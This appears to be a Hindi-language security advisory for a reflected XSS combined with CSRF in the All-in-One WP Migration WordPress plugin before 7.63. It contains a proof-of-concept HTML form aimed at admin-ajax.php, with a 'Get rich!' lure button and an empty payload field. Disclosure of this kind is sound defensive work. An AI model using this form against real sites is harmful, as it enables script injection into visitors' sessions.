
All-in-One WP Migration < 7.63 - अप्रमाणित Reflected XSS + CSRF
प्लगइन गलत कंटेंट प्रकार का उपयोग करता है, और ai1wm_export कार्रवाई से प्रतिक्रिया को ठीक से एस्केप नहीं करता है, जिससे हमलावर एक अनुरोध तैयार कर सकता है जो किसी भी विज़िटर द्वारा सबमिट करने पर प्रतिक्रिया में मनमाना html या javascript इंजेक्ट करेगा जो पीड़ित के सत्र में निष्पादित होगा।
दोष को पुन: उत्पन्न करने के लिए, हम प्लगइन द्वारा सभी वेबसाइट सामग्री निर्यात कर सकते हैं और आउटपुट फ़ाइल नाम में एक अमान्य नाम डाल सकते हैं।
भेद्यता को मान्य करके, हमले को CSRF के साथ जोड़ना संभव है, जो पीड़ित के ब्राउज़र को पेलोड के साथ एक अनुरोध भेजने के लिए मजबूर करेगा।
<form action="https://example.com/wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1" method="POST">
<!--
Note: The secret key must be obtained through other means.
It is stored in the site option `ai1wm_secret_key`, but is
static for the lifetime of the site.
-->
<input type="hidden" name="secret_key" value="[secret_key]">
<input type="hidden" name="ai1wm_manual_export" value="1">
<input type="hidden" name="archive" value="">
<input type="submit" value="Get rich!">
</form>
All-in-One WP Migration < 7.63
प्रकार: क्रॉस-साइट स्क्रिप्टिंग
OWASP TOP 10: A03:2021-इंजेक्शन
CWE: CWE-79 वेब पेज जनरेशन के दौरान इनपुट का अनुचित न्यूट्रलाइज़ेशन ('क्रॉस-साइट स्क्रिप्टिंग')
Geovanni Campos (GeoZIN), Thiago Martins (Kirito), Jorge Buzeti (R3tr0), Leandro Inacio (Saitama), Lucas de Souza (Sinnat), Matheus Oliveira (Froyd), Filipe Baptistella (Baptistella), Leonardo Paiva (Megatron), Jose Thomaz (Pip3r), Joao Maciel (Yohan), Vinicius Pereira (Vini), , Hudson Nowak (Nowak) e Guilherme Acerbi (Ghost).